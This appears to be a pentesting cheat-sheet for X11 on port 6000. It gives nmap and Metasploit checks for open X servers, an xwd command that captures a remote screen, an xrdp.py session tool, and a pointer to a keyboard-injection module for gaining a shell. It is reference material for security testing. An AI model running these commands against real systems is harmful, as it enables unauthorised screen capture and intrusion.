Links

6000 - X11

The X Window System (X11, or simply X) is a windowing system for bitmap displays, common on Unix-like operating systems. X provides the basic framework for a GUI environment.

Nmap

Script:
x11-access.nse
Host script results:
|_ x11-access: X server access is granted

Sensepost created the following nmap script

Usage
nmap -p6000 <host> --script x11-active-displays.nse
nmap -p6000 <host> --script x11-active-displays.nse --script-args=unsafe=1,dir="/home/<username>/Documents/"
Output
Host script results:
| x11-active-displays: X server access is granted
| Active display
|_ Screenshot saved to /tmp/<ip>:<dp>.jpg
Host script results:
| x11-active-displays: X server access is granted
|_ No active display

Metasploit

X11 No-Auth Scanner - Module scans for X11 servers that allow anyone to connect without authentication.
auxiliary/scanner/x11/open_x11

Connect to X11 server

Xorg:
sudo Xorg -terminate -query $REMOTE_HOST :1
Using X:
X :1 -query s390vm.example.com
  • To exit press 'ctrl+alt+enter'
To enable XDMCP in Remmina run the following:
sudo apt-get install remmina-plugin-xdmcp

Taking screenshot

xwd

XWD It is an X Window System utility that helps in taking screenshots. On our Kali System, we will use the xwd to take the screenshot of Xserver. This utility takes the screenshots in xwd format.
To take a screenshot run:
xwd -root -screen -silent -display 192.168.1.109:0 > screenshot.xwd
Here we have the screenshot captured by the xwd, but it is in .xwd format, so to view it we will have to convert it to a viewable format like .png
Note: You may need to install imagemagick to convert to png, convert is not pre installed on kali
convert screenshot.xwd screenshot.png
On opening the png file we can see that the xwd tool has successfully captured the screenshot of the target system.

xrdp

iron@kali2:/opt/xrdp$ python xrdp.py 192.168.0.62:0
_
__ ___ __ __| |_ __
\ \/ / '__/ _` | '_ \
> <| | | (_| | |_) |
/_/\_\_| \__,_| .__/
|_|
X11 Remote Desktop
xrdp.py <host>:<dp>
------------------------
Example:
xrdp.py 10.0.0.10:0
xrdp.py 10.0.0.10:0 --no-disp

Gaining remote shell

we will use the X11 Keyboard Command Injection module of the Metasploit Framework. This module exploits open X11 Server by connecting and registering a virtual keyboard. Then the Virtual Keyboard is used to open an xterm or gnome-terminal and then type and execute the payload.